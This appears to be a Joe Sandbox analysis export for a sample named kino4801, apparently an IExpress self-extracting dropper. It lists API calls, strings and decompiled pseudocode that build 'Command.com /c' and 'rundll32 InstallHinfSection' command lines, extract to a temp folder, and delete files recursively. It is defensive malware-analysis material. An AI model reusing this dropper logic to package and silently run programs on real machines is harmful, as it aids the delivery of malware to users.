0x010d3e9b
0x010d3e9b
0x010d3e9f
0x010d3ea2
0x010d3ea4
0x010d3ea4
0x010d3ea9
0x010d3ea9
0x010d3ead
0x010d3eb3
0x010d3eb6
0x010d3eb8
0x010d3eb8
0x010d3ebd
0x010d3ebd
0x010d3ec1
0x010d3ec3
0x010d3ec5
0x010d3ec5
0x010d3eca
0x010d3eca
0x010d3ece
0x010d3ed5
0x010d3ed9
0x010d3ee0
0x010d3ee6
0x010d3eea
0x010d3eec
0x010d3eee
0x010d3ef3
0x010d3ef3
0x010d3ef5
0x010d3efa
0x010d3efb
0x010d3efd
0x010d3f40
0x00000000
0x010d3eff
0x010d3eff
0x010d3f05
0x00000000
0x010d3f05
0x010d3efd
0x010d3dc7
0x010d3dce
0x00000000
0x00000000
0x010d3dd0
0x010d3dd7
0x00000000
0x00000000
0x010d3dd9
0x010d3ddb
0x00000000
0x00000000
0x010d3ddd
0x010d3de1
0x00000000
0x010d3de1
0x010d3d59
0x010d3d65
0x010d3d6a
0x010d3d6c
0x00000000
0x00000000
0x010d3d6e
0x010d3d75
0x00000000
0x00000000
0x010d3d8f
0x010d3d96
0x010d3d98
0x00000000
0x00000000
0x00000000
0x010d3d98
0x010d3c8f
0x010d3c98
0x010d3cf1
0x010d3cf3
0x00000000
0x00000000
0x010d3cfe
0x010d3d11
0x00000000
0x00000000
0x00000000
0x010d3d11
0x010d3c9c
0x010d3ca5
0x010d3ca7
0x00000000
0x00000000
0x010d3cad
0x010d3cb2
0x010d3cb7
0x010d3cc5
0x00000000
0x00000000
0x010d3ce8
0x010d3cec
0x010d3ced
0x010d3ced
0x00000000
0x010d3ce8
0x010d3c9e
0x00000000
0x010d3c9e
0x010d3c56
0x010d3d35
0x010d3d35
0x010d3d3c
0x010d3d48
0x00000000
0x010d3d48
0x010d3c03
0x010d3be2
0x010d3be7
0x010d3bee
0x00000000
0x00000000
0x00000000
0x00000000

APIs

memset.MSVCRT ref: 010D3C11
CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 010D3CDC

Part of subcall function 010D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46A0
Part of subcall function 010D468F: SizeofResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46A9
Part of subcall function 010D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46C3
Part of subcall function 010D468F: LoadResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46CC
Part of subcall function 010D468F: LockResource.KERNEL32(00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46D3
Part of subcall function 010D468F: memcpy_s.MSVCRT ref: 010D46E5
Part of subcall function 010D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46EF

CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,010D8C42), ref: 010D3D8F
GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 010D3E26
FreeLibrary.KERNEL32(00000000,?,010D8C42), ref: 010D3EFF
LocalFree.KERNEL32(?,?,?,?,010D8C42), ref: 010D3F1F
FreeLibrary.KERNEL32(00000000,?,010D8C42), ref: 010D3F40
LocalFree.KERNEL32(?,?,?,?,010D8C42), ref: 010D3F47
FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,010D8C42), ref: 010D3F76
LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,010D8C42), ref: 010D3F80
LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,010D8C42), ref: 010D3FC2

Strings

<None>, xrefs: 010D3CC9, 010D3D7D
advpack.dll, xrefs: 010D3F9D
DoInfInstall, xrefs: 010D3E1F, 010D3E24, 010D3F68
REBOOT, xrefs: 010D3BE2
USRQCMD, xrefs: 010D3CAD
RUNPROGRAM, xrefs: 010D3D05
ADMQCMD, xrefs: 010D3C9E
C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 010D3E74
doza2, xrefs: 010D3E68
POSTRUNPROGRAM, xrefs: 010D3D60
SHOWWINDOW, xrefs: 010D3C34
D, xrefs: 010D3C19

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$doza2
API String ID: 1032054927-885953201
Opcode ID: 746b6419ef69c125de663fa1deea86c6764120465f3e2f8f593d7cd4deb9d382
Instruction ID: cc407f0f22105def04b8b901db5d1f2000925f91e6a2e9cdd3585147e3582f21
Opcode Fuzzy Hash: 746b6419ef69c125de663fa1deea86c6764120465f3e2f8f593d7cd4deb9d382
Instruction Fuzzy Hash: F5B1CDB06093059BE770AF28D845B6B7AE4FB84704F00496EFAD5DA1C0DB7AC844CB97

Uniqueness

Uniqueness Score: -1.00%

Function 010D1AE8 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 291
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E010D1AE8(long __ecx, CHAR** _a4, int* _a8) {
				signed int _v8;
				char _v268;
				char _v527;
				char _v528;
				char _v1552;
				CHAR* _v1556;
				int* _v1560;
				CHAR** _v1564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				CHAR* _t53;
				CHAR* _t54;
				char* _t57;
				char* _t58;
				CHAR* _t60;
				void* _t62;
				signed char _t65;
				intOrPtr _t76;
				intOrPtr _t77;
				unsigned int _t85;
				CHAR* _t90;
				CHAR* _t92;
				char _t105;
				char _t106;
				CHAR** _t111;
				CHAR* _t115;
				intOrPtr* _t125;
				void* _t126;
				CHAR* _t132;
				CHAR* _t135;
				void* _t138;
				void* _t139;
				void* _t145;
				intOrPtr* _t146;
				char* _t148;
				CHAR* _t151;
				void* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t157;
				signed int _t158;

				_t48 =  *0x10d8004; // 0x261cebeb
				_v8 = _t48 ^ _t158;
				_t108 = __ecx;
				_v1564 = _a4;
				_v1560 = _a8;
				E010D1680( &_v528, 0x104, __ecx);
				if(_v528 != 0x22) {
					_t135 = " ";
					_t53 =  &_v528;
				} else {
					_t135 = "\"";
					_t53 =  &_v527;
				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E010D1A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E010D1781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\");
					E010D658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E010D1680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E010D66C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E010D66C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E010D1680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E010D1781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E010D16B3( &_v1552, 0x400, " ");
										E010D16B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E010D2AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E010D171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E010D1A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E010D1A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E010D44B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0x10d9120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1560 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x10d1140, _t156, 8,  &_v268) == 0) {
										 *0x10d9a34 =  *0x10d9a34 & 0xfffffffb;
										if( *0x10d9a40 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
											GetShortPathNameA( &_v268,  &_v268, 0x104);
										}
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										_push( &_v268);
										_push(_t155);
										E010D171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
									} else {
										 *0x10d9a34 =  *0x10d9a34 | 0x00000004;
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										E010D1680(_t108, 0x104, _t155);
										_t140 = 0x200;
										E010D1680(_t156, 0x200,  &_v268);
									}
									L53:
									_t62 = 1;
									 *_v1564 = _t156;
									L54:
									_pop(_t152);
									return E010D6CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
								}
							}
						}
					}
				}
			}

0x010d1af3
0x010d1afa
0x010d1b07
0x010d1b09
0x010d1b1a
0x010d1b20
0x010d1b2c
0x010d1b3b
0x010d1b40
0x010d1b2e
0x010d1b2e
0x010d1b33
0x010d1b33
0x010d1b46
0x010d1b4c
0x010d1b52
0x010d1b57
0x010d1b5d
0x010d1b61
0x010d1b9f
0x010d1b9f
0x010d1bb1
0x010d1bc2
0x00000000
0x010d1b63
0x010d1b63
0x010d1b65
0x010d1b68
0x010d1b68
0x010d1b6a
0x010d1b6b
0x010d1b6f
0x010d1b74
0x00000000
0x00000000
0x010d1b76
0x010d1b7b
0x010d1b86
0x00000000
0x00000000
0x00000000
0x00000000
0x010d1b8c
0x010d1b8c
0x010d1b98
0x010d1bc7
0x010d1bc9
0x010d1bcc
0x010d1bd3
0x010d1d75
0x010d1d76
0x010d1d78
0x010d1d7f
0x010d1e05
0x010d1e09
0x00000000
0x00000000
0x010d1e12
0x010d1e1b
0x010d1e73
0x010d1e21
0x010d1e21
0x010d1e28
0x010d1e37
0x010d1e3e
0x010d1e52
0x010d1e60
0x010d1e60
0x010d1e3e
0x010d1e79
0x010d1e7b
0x010d1e84
0x00000000
0x010d1d9b
0x010d1d9b
0x010d1da0
0x010d1da2
0x010d1da5
0x010d1da5
0x010d1da7
0x010d1da8
0x010d1dac
0x010d1dae
0x010d1db4
0x010d1db7
0x010d1db7
0x010d1db9
0x010d1dba
0x010d1dbe
0x010d1dc3
0x010d1dce
0x010d1dd2
0x010d1deb
0x00000000
0x010d1df0
0x00000000
0x010d1dd2
0x010d1bf7
0x010d1bfe
0x010d1c07
0x010d1d55
0x010d1d5a
0x010d1d5b
0x010d1d5d
0x010d1d5e
0x00000000
0x010d1c1b
0x010d1c1b
0x010d1c20
0x010d1c2c
0x010d1c33
0x010d1c38
0x010d1c3a
0x010d1c3a
0x010d1c40
0x010d1c4b
0x010d1c4b
0x010d1c5d
0x010d1c61
0x010d1dd4
0x010d1dd4
0x010d1dd6
0x010d1ddb
0x010d1ddc
0x010d1dde
0x010d1d64
0x010d1d64
0x010d1d67
0x010d1d6c
0x00000000
0x010d1c67
0x010d1c67
0x010d1c6d
0x010d1c72
0x010d1c74
0x010d1c74
0x010d1c8e
0x010d1c99
0x010d1cc0
0x010d1cf8
0x010d1d07
0x010d1d23
0x010d1d09
0x010d1d14
0x010d1d1b
0x010d1d1b
0x010d1d2b
0x010d1d2d
0x010d1d2d
0x010d1d38
0x010d1d39
0x010d1d46
0x010d1cc2
0x010d1cc2
0x010d1ccc
0x010d1cce
0x010d1cce
0x010d1cdb
0x010d1ce6
0x010d1cee
0x010d1cee
0x010d1e89
0x010d1e91
0x010d1e92
0x010d1e94
0x010d1e97
0x010d1ea4
0x010d1ea4
0x010d1c61
0x010d1c07
0x010d1bd3
0x010d1b7b

APIs

CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,?,00000000,00000001,00000000), ref: 010D1BE7
GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,?,00000000,00000001,00000000), ref: 010D1BFE
LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,?,00000000,00000001,00000000), ref: 010D1C57
GetPrivateProfileIntA.KERNEL32 ref: 010D1C88
GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,010D1140,00000000,00000008,?), ref: 010D1CB8
GetShortPathNameA.KERNEL32 ref: 010D1D1B

Part of subcall function 010D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010D4518
Part of subcall function 010D44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 010D4554

Strings

DefaultInstall, xrefs: 010D1C74, 010D1C87, 010D1CCE, 010D1CD3, 010D1D2D, 010D1D39
AdvancedINF, xrefs: 010D1CAE
setupx.dll, xrefs: 010D1D14
", xrefs: 010D1B25
.BAT, xrefs: 010D1D83
Reboot, xrefs: 010D1C82
C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 010D1BA0
rundll32.exe %s,InstallHinfSection %s 128 %s, xrefs: 010D1D3B
Version, xrefs: 010D1CB3
setupapi.dll, xrefs: 010D1D23, 010D1D3A
Command.com /c %s, xrefs: 010D1D9B, 010D1DE8
.INF, xrefs: 010D1BDB

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
API String ID: 383838535-3401884814
Opcode ID: ed84142cd2e4cfdebd01dab6928d1865ffd986d50b6b229d88b9822915a527e0
Instruction ID: 1cd4f7c3f0556dd74a549e06e8f287729551a4c570a57170f901a7dbfa7361c8
Opcode Fuzzy Hash: ed84142cd2e4cfdebd01dab6928d1865ffd986d50b6b229d88b9822915a527e0
Instruction Fuzzy Hash: FEA17970A003196BEB70AB38CC44FEA3BA9AF55310F1442D9E5D5A32C1DFB19E85CB50

Uniqueness

Uniqueness Score: -1.00%

Function 010D2F1D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 120
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E010D2F1D(void* __ecx, int __edx) {
				signed int _v8;
				char _v272;
				_Unknown_base(*)()* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				void* _t11;
				struct HWND__* _t12;
				void* _t14;
				int _t21;
				signed int _t22;
				signed int _t25;
				intOrPtr* _t26;
				signed int _t27;
				void* _t30;
				_Unknown_base(*)()* _t31;
				void* _t34;
				struct HINSTANCE__* _t36;
				intOrPtr _t41;
				intOrPtr* _t44;
				signed int _t46;
				int _t47;
				void* _t58;
				void* _t59;

				_t43 = __edx;
				_t9 =  *0x10d8004; // 0x261cebeb
				_v8 = _t9 ^ _t46;
				if( *0x10d8a38 != 0) {
					L5:
					_t11 = E010D5164(_t52);
					_t53 = _t11;
					if(_t11 == 0) {
						L16:
						_t12 = 0;
						L17:
						return E010D6CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
					}
					_t14 = E010D55A0(_t53); // executed
					if(_t14 == 0) {
						goto L16;
					} else {
						_t45 = 0x105;
						GetSystemDirectoryA( &_v272, 0x105);
						_t43 = 0x105;
						_t40 =  &_v272;
						E010D658A( &_v272, 0x105, "advapi32.dll");
						_t36 = LoadLibraryA( &_v272);
						_t44 = 0;
						if(_t36 != 0) {
							_t31 = GetProcAddress(_t36, "DecryptFileA");
							_v276 = _t31;
							if(_t31 != 0) {
								_t45 = _t47;
								_t40 = _t31;
								 *0x10da288("C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\", 0); // executed
								_v276();
								if(_t47 != _t47) {
									_t40 = 4;
									asm("int 0x29");
								}
							}
						}
						FreeLibrary(_t36);
						_t58 =  *0x10d8a24 - _t44; // 0x0
						if(_t58 != 0) {
							L14:
							_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\"); // executed
							if(_t21 != 0) {
								__eflags =  *0x10d8a2c - _t44; // 0x0
								if(__eflags != 0) {
									L20:
									__eflags =  *0x10d8d48 & 0x000000c0;
									if(( *0x10d8d48 & 0x000000c0) == 0) {
										_t41 =  *0x10d9a40; // 0x3, executed
										_t26 = E010D256D(_t41); // executed
										_t44 = _t26;
									}
									_t22 =  *0x10d8a24; // 0x0
									 *0x10d9a44 = _t44;
									__eflags = _t22;
									if(_t22 != 0) {
										L26:
										__eflags =  *0x10d8a38;
										if( *0x10d8a38 == 0) {
											__eflags = _t22;
											if(__eflags == 0) {
												E010D4169(__eflags);
											}
										}
										_t12 = 1;
										goto L17;
									} else {
										__eflags =  *0x10d9a30 - _t22; // 0x0
										if(__eflags != 0) {
											goto L26;
										}
										_t25 = E010D3BA2(); // executed
										__eflags = _t25;
										if(_t25 == 0) {
											goto L16;
										}
										_t22 =  *0x10d8a24; // 0x0
										goto L26;
									}
								}
								_t27 = E010D3B26(_t40, _t44);
								__eflags = _t27;
								if(_t27 == 0) {
									goto L16;
								}
								goto L20;
							}
							_t43 = 0x4bc;
							E010D44B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
							 *0x10d9124 = E010D6285();
							goto L16;
						}
						_t59 =  *0x10d9a30 - _t44; // 0x0
						if(_t59 != 0) {
							goto L14;
						}
						_t30 = E010D621E(); // executed
						if(_t30 == 0) {
							goto L16;
						}
						goto L14;
					}
				}
				_t49 =  *0x10d8a24;
				if( *0x10d8a24 != 0) {
					L4:
					_t34 = E010D3A3F(_t51);
					_t52 = _t34;
					if(_t34 == 0) {
						goto L16;
					}
					goto L5;
				}
				if(E010D51E5(_t49) == 0) {
					goto L16;
				}
				_t51 =  *0x10d8a38;
				if( *0x10d8a38 != 0) {
					goto L5;
				}
				goto L4;
			}

0x010d2f1d
0x010d2f28
0x010d2f2f
0x010d2f3d
0x010d2f6c
0x010d2f6c
0x010d2f71
0x010d2f73
0x010d3041
0x010d3041
0x010d3043
0x010d3053
0x010d3053
0x010d2f79
0x010d2f80
0x00000000
0x010d2f86
0x010d2f86
0x010d2f93
0x010d2f9e
0x010d2fa0
0x010d2fa6
0x010d2fb8
0x010d2fba
0x010d2fbe
0x010d2fc6
0x010d2fcc
0x010d2fd4
0x010d2fd6
0x010d2fd8
0x010d2fe0
0x010d2fe6
0x010d2fee
0x010d2ff0
0x010d2ff5
0x010d2ff5
0x010d2fee
0x010d2fd4
0x010d2ff8
0x010d2ffe
0x010d3004
0x010d3017
0x010d301c
0x010d3024
0x010d3054
0x010d305a
0x010d3065
0x010d3065
0x010d306c
0x010d306e
0x010d3075
0x010d307a
0x010d307a
0x010d307c
0x010d3081
0x010d3087
0x010d3089
0x010d30a1
0x010d30a1
0x010d30a9
0x010d30ab
0x010d30ad
0x010d30af
0x010d30af
0x010d30ad
0x010d30b6
0x00000000
0x010d308b
0x010d308b
0x010d3091
0x00000000
0x00000000
0x010d3093
0x010d3098
0x010d309a
0x00000000
0x00000000
0x010d309c
0x00000000
0x010d309c
0x010d3089
0x010d305c
0x010d3061
0x010d3063
0x00000000
0x00000000
0x00000000
0x010d3063
0x010d302b
0x010d3032
0x010d303c
0x00000000
0x010d303c
0x010d3006
0x010d300c
0x00000000
0x00000000
0x010d300e
0x010d3015
0x00000000
0x00000000
0x00000000
0x010d3015
0x010d2f80
0x010d2f3f
0x010d2f46
0x010d2f5f
0x010d2f5f
0x010d2f64
0x010d2f66
0x00000000
0x00000000
0x00000000
0x010d2f66
0x010d2f4f
0x00000000
0x00000000
0x010d2f55
0x010d2f5d
0x00000000
0x00000000
0x00000000

APIs

GetSystemDirectoryA.KERNEL32 ref: 010D2F93
LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 010D2FB2
GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 010D2FC6
DecryptFileA.ADVAPI32 ref: 010D2FE6
FreeLibrary.KERNEL32(00000000), ref: 010D2FF8
SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 010D301C

Part of subcall function 010D51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,010D2F4D,?,00000002,00000000), ref: 010D5201

Strings

advapi32.dll, xrefs: 010D2F99
C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 010D2FDB, 010D3017
DecryptFileA, xrefs: 010D2FC0

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$DecryptFileA$advapi32.dll
API String ID: 2126469477-3395714304
Opcode ID: 91289b71f9bb5fd24269c9eea198347ccd330ca9c8c55b162b403bf062b58e12
Instruction ID: ea1ae867a40cabce1fb9080f12161bd70bcd90704692a8f9692a425c921c2b30
Opcode Fuzzy Hash: 91289b71f9bb5fd24269c9eea198347ccd330ca9c8c55b162b403bf062b58e12
Instruction Fuzzy Hash: 0641FA71A013168AEB71AB7D9C547A63BE8BB44754F0040A5FEC1CA145EB7AC580CB63

Uniqueness

Uniqueness Score: -1.00%

Function 010D2390 Relevance: 12.1, APIs: 8, Instructions: 93
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E010D2390(CHAR* __ecx) {
				signed int _v8;
				char _v276;
				char _v280;
				char _v284;
				struct _WIN32_FIND_DATAA _v596;
				struct _WIN32_FIND_DATAA _v604;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				int _t36;
				void* _t46;
				void* _t62;
				void* _t63;
				CHAR* _t65;
				void* _t66;
				signed int _t67;
				signed int _t69;

				_t69 = (_t67 & 0xfffffff8) - 0x254;
				_t21 =  *0x10d8004; // 0x261cebeb
				_t22 = _t21 ^ _t69;
				_v8 = _t21 ^ _t69;
				_t65 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
					L10:
					_pop(_t62);
					_pop(_t66);
					_pop(_t46);
					return E010D6CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
				} else {
					E010D1680( &_v276, 0x104, __ecx);
					_t58 = 0x104;
					E010D16B3( &_v280, 0x104, "*");
					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
					_t63 = _t22;
					if(_t63 == 0xffffffff) {
						goto L10;
					} else {
						goto L3;
					}
					do {
						L3:
						_t58 = 0x104;
						E010D1680( &_v276, 0x104, _t65);
						if((_v604.ftCreationTime & 0x00000010) == 0) {
							_t58 = 0x104;
							E010D16B3( &_v276, 0x104,  &(_v596.dwReserved1));
							SetFileAttributesA( &_v280, 0x80);
							DeleteFileA( &_v280);
						} else {
							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
								E010D16B3( &_v276, 0x104,  &(_v596.cFileName));
								_t58 = 0x104;
								E010D658A( &_v280, 0x104, 0x10d1140);
								E010D2390( &_v284);
							}
						}
						_t36 = FindNextFileA(_t63,  &_v596); // executed
					} while (_t36 != 0);
					FindClose(_t63); // executed
					_t22 = RemoveDirectoryA(_t65); // executed
					goto L10;
				}
			}

0x010d2398
0x010d239e
0x010d23a3
0x010d23a5
0x010d23ae
0x010d23b3
0x010d24cb
0x010d24d2
0x010d24d3
0x010d24d4
0x010d24df
0x010d23c2
0x010d23d1
0x010d23db
0x010d23e4
0x010d23f6
0x010d23fc
0x010d2401
0x00000000
0x00000000
0x00000000
0x00000000
0x010d2407
0x010d2407
0x010d2408
0x010d2411
0x010d241f
0x010d247a
0x010d2483
0x010d2495
0x010d24a3
0x010d2421
0x010d242f
0x010d2453
0x010d245d
0x010d2466
0x010d2472
0x010d2472
0x010d242f
0x010d24af
0x010d24b5
0x010d24be
0x010d24c5
0x00000000
0x010d24c5

APIs

FindFirstFileA.KERNELBASE(?,010D8A3A,010D11F4,010D8A3A,00000000,?,?), ref: 010D23F6
lstrcmpA.KERNEL32(?,010D11F8), ref: 010D2427
lstrcmpA.KERNEL32(?,010D11FC), ref: 010D243B
SetFileAttributesA.KERNEL32(?,00000080,?), ref: 010D2495
DeleteFileA.KERNEL32(?), ref: 010D24A3
FindNextFileA.KERNELBASE(00000000,00000010), ref: 010D24AF
FindClose.KERNELBASE(00000000), ref: 010D24BE
RemoveDirectoryA.KERNELBASE(010D8A3A), ref: 010D24C5

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
String ID:
API String ID: 836429354-0
Opcode ID: 68ee347738cc41d3da11f69a4aee2b671cc07626fb09fbd64ddb13d9a7b16e51
Instruction ID: ff7caeb8733792fbb63f93d0595c72f50002d6cbcd6a4c2d164eae63206117eb
Opcode Fuzzy Hash: 68ee347738cc41d3da11f69a4aee2b671cc07626fb09fbd64ddb13d9a7b16e51
